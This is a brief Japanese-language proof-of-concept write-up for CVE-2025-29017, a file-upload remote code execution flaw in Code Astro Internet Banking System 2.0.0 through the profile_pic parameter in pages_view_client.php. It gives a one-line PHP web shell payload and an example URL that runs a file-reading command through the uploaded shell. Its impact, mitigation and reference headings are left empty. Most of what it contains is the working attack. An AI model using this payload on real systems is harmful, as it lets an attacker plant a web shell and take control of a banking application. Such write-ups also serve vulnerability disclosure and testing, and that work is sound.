
CVE-2025-29017 用の概念実証エクスプロイト。Code Astro Internet Banking System 2.0.0 における悪意のあるファイルアップロードを介したリモートコード実行を実証します。
Code Astro Internet Banking System 2.0.0 には、pages_view_client.php 内の profile_pic パラメータにおける不適切なファイルアップロード検証により、リモートコード実行 (RCE) の脆弱性が存在します。攻撃者はアップロードリクエストを変更することでセキュリティチェックをバイパスし、任意のコード実行が可能になります。
pages_view_client.php 内の profile_pic パラメータ


<?php system($_GET['cmd']); ?>


http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt

影響
緩和策
参照